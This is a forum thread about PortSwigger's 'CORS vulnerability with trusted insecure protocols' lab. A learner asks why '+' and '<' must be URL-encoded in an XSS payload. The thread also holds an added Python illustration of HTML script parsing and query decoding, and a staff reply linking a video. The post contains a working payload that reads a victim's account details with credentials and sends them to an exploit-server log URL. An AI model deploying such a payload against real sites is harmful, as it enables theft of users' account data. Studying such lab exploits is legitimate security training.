Burp Suite User Forum

Weird need for URL encoding in XSS in CORS lab

Jaak | Last updated: Jun 29, 2022 09:20PM UTC

Hello, I have been doing the "Lab: CORS vulnerability with trusted insecure protocols". I think I understand the vulnerability pretty well; however, I had trouble getting the exploit to work until I looked at the solution. There seems to be a weird need for URL encoding (perhaps not so weird after all, since it works, but I have no clue why). In any case, this is the exploit script I tried (which I basically copied from https://portswigger.net/web-security/cors):

<script> document.location="http://stock.0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/?productId=4<script>var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://0ac6004f04a7eb44c01967d300f600e5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();function reqListener() {location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>&storeId=1" </script>

Notice the last part:

"{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='+this.responseText;};</script>"

This exploit didn't work. However, in the solution, the exploit is exactly the same except for one '+' and one '<' being URL encoded in the last part mentioned above:

"{location='https://exploit-0ab400600418eb7bc09e672e01250004.web-security-academy.net/log?key='%2bthis.responseText;};%3c/script>"

Both need to be URL encoded in order for the exploit to work. If the '<' isn't URL encoded, the XSS doesn't work at all, meaning there's no "script" in the response HTML. If the '+' isn't URL encoded, the XSS does work in theory but doesn't properly append 'this.responseText' to the URL. Now, I googled a little and I guess the plus sign must be URL encoded since 'the plus sign is used as shorthand for a space in query parameters'. But I cannot make any sense of why the '<' needs to be URL encoded?
I have tried around a little and it seems like either the '<' or the '>' of the '/script' tag needs to be URL encoded. Does anybody know the answer to this? It seems like this is an issue worth understanding for any XSS challenge. Any help would be very much appreciated :)
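The two encoding questions in the post above come down to two separate parsing rules. First, a server decodes a raw '+' in a query string as a space (form encoding), so only %2B survives as a literal plus sign. Second, an HTML tokenizer treats everything inside a <script> element as raw text and ends the element at the first literal </script> it meets, even when that tag sits inside a JavaScript string; an unencoded closing tag therefore cuts the outer script off mid-string, which is also why embedding untrusted data in an inline script is unsafe unless '</' is escaped. The Python below is an added illustration for this thread, not code from the lab or the post; it uses only the standard library's html.parser and urllib.parse, all sample strings are constructed, and app.example and collector.example are placeholder hostnames.

```python
"""Why '+' and '</script>' behave differently once they pass through a
URL query string and an HTML page.

Added illustration for the forum thread, not code from the lab or the
post. All sample strings are constructed; app.example and
collector.example are placeholder hosts.
"""
from html.parser import HTMLParser
from urllib.parse import parse_qs, quote, urlsplit


class ScriptCollector(HTMLParser):
    """Collect the raw text of each <script> element exactly as the HTML
    tokenizer delimits it: script content is raw text that ends at the
    first literal '</script>', regardless of JavaScript quoting."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self.scripts.append("")

    def handle_data(self, data):
        if self._in_script:
            self.scripts[-1] += data

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False


def script_bodies(html):
    """Return the JavaScript text of every <script> element in `html`."""
    parser = ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def query_param(url, name):
    """Decode one query parameter the way a form-encoding-aware server
    does: a raw '+' becomes a space, while '%2B' becomes a literal '+'."""
    return parse_qs(urlsplit(url).query)[name][0]


def encode_for_query(value):
    """Percent-encode a value so that '+', '<', '>' and friends survive a
    query string intact (safe='' also encodes '/')."""
    return quote(value, safe="")


if __name__ == "__main__":
    # 1. An inline script whose JS string literal contains a full
    #    <script>...</script> pair. The tokenizer stops the outer element
    #    at the inner '</script>', leaving an unterminated string literal.
    raw = '<script>location="https://app.example/?q=<script>f()</script>";</script>'
    print(script_bodies(raw))

    # 2. The same page with only the '<' of the closing tag percent-encoded:
    #    the outer script now holds the whole intended statement.
    enc = '<script>location="https://app.example/?q=<script>f()%3c/script>";</script>'
    print(script_bodies(enc))

    # 3. A raw '+' in a query parameter is decoded as a space, so a value
    #    meant to stay a plus sign must be sent as %2B.
    print(repr(query_param("https://collector.example/log?key=abc+def", "key")))
    print(repr(query_param("https://collector.example/log?key=abc%2bdef", "key")))
    print(encode_for_query("'+x"))
```

Running the script shows the first page's outer script body ending right after the inner f(), while the encoded variant keeps the complete statement; the opening <script> inside the string is harmless because only the closing tag matters to the tokenizer. The query-string half shows 'abc def' for the raw plus and 'abc+def' for %2b, which is the behaviour the post describes for this.responseText.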

Ben, PortSwigger Agent | Last updated: Jul 01, 2022 07:03AM UTC

Hi Jaak, Rana has a good video explaining her methodology here: https://www.youtube.com/watch?v=pYw6lciCBCw She uses a slightly different solution from the written solution. However, the methodology and reasoning behind what she is doing are the same, and she explains why she needs to URL-encode specific characters.